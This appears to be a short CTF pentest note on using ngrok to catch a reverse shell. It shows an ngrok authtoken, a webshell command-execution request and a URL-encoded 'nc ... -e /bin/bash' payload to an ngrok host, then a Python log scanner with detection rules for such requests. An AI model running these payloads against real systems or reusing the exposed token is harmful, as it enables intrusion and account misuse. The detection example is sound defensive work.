1. Unzip to install
On Linux or Mac OS X you can unzip ngrok from a terminal with the following command. On Windows, just double click ngrok.zip to extract it.
$ unzip /path/to/ngrok.zip
2. Connect your account
Running this command will add your authtoken to the default ngrok.yml configuration file. This will grant you access to more features and longer session times. Running tunnels will be listed on the status page of the dashboard.
$ ./ngrok authtoken 1fu9GMyDHHprxjIHAHWJV9JcsWG_68xWVAvAoYd3iuGTEgATq
3. Fire it up
Read the documentation on how to use ngrok. Try it out by running it from the command line:
$ ./ngrok help
To start an HTTP tunnel forwarding to your local port 80, run this next:
$ ./ngrok http 80
Next, check out some tutorials, like the one below.
Question on gym: I can run
E:\PENTEST>curl http://164.90.147.56:8081/upload/kamehameha.php?telepathy=id
PNG
uid=33(www-data) gid=33(www-data) groups=33(www-data)
E:\PENTEST>
How to get a shell (if I do not want to enable NAT on my router, thus using my WAN IP), because the CTF is not accessible by VPN (like HTB etc.)?
Download from https://dashboard.ngrok.com/get-started/setup
.
.
Next we trigger it, like on Buff or at the DEF CON Red Team Village:
http://164.90.147.56:8081/upload/kamehameha.php?telepathy=nc%200.tcp.ngrok.io%2015283%20-e%20/bin/bash
or download from https://github.com/puckiestyle/pentest/blob/master/ngrok-stable-windows-amd64.zip
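Seen from the web server's side, both requests above leave a recognisable trace in the access log. The following added example (not part of the original post) scans constructed sample log lines for PHP scripts served from an upload directory and for percent-decoded query values that carry a command or an ngrok endpoint. The log lines, client addresses and rule names are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format). Client IPs are documentation
# addresses; the two kamehameha.php requests mirror the URLs shown on this page.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2021:10:00:01 +0000] "GET /upload/kamehameha.php?telepathy=id HTTP/1.1" 200 31 "-" "curl/7.55.1"
203.0.113.7 - - [01/Jan/2021:10:02:13 +0000] "GET /upload/kamehameha.php?telepathy=nc%200.tcp.ngrok.io%2015283%20-e%20/bin/bash HTTP/1.1" 200 0 "-" "curl/7.55.1"
198.51.100.4 - - [01/Jan/2021:10:03:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2021:10:04:00 +0000] "GET /upload/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} ')

# Rule for the request path: a PHP script served from an upload directory.
PATH_RULES = {
    "script-under-upload": re.compile(r"^/uploads?/.*\.ph(?:p\d?|tml)$", re.I),
}
# Rules for percent-decoded query-string values.
VALUE_RULES = {
    "recon-command": re.compile(r"^(?:id|whoami|uname(?: -a)?)$"),
    "ngrok-endpoint": re.compile(r"\b[\w.-]+\.ngrok\.io\b", re.I),
    "netcat-exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s", re.I),
    "shell-path": re.compile(r"/bin/(?:ba|da|z)?sh\b"),
}

def scan(log_text):
    """Return (client, path, sorted rule names) for each request that trips a rule."""
    results = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        url = urlsplit(target)
        hits = {name for name, rx in PATH_RULES.items() if rx.search(url.path)}
        # parse_qsl percent-decodes, so "nc%200.tcp..." is matched as "nc 0.tcp..."
        for _, value in parse_qsl(url.query, keep_blank_values=True):
            hits |= {name for name, rx in VALUE_RULES.items() if rx.search(value)}
        if hits:
            results.append((client, url.path, sorted(hits)))
    return results

if __name__ == "__main__":
    for client, path, rules in scan(SAMPLE_LOG):
        print(f"{client} {path} -> {', '.join(rules)}")
```

Matching on the decoded value is what catches the second request: the raw log line contains `nc%200.tcp.ngrok.io`, which a plain-text search for `nc ` would miss.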
Author : Puckiestyle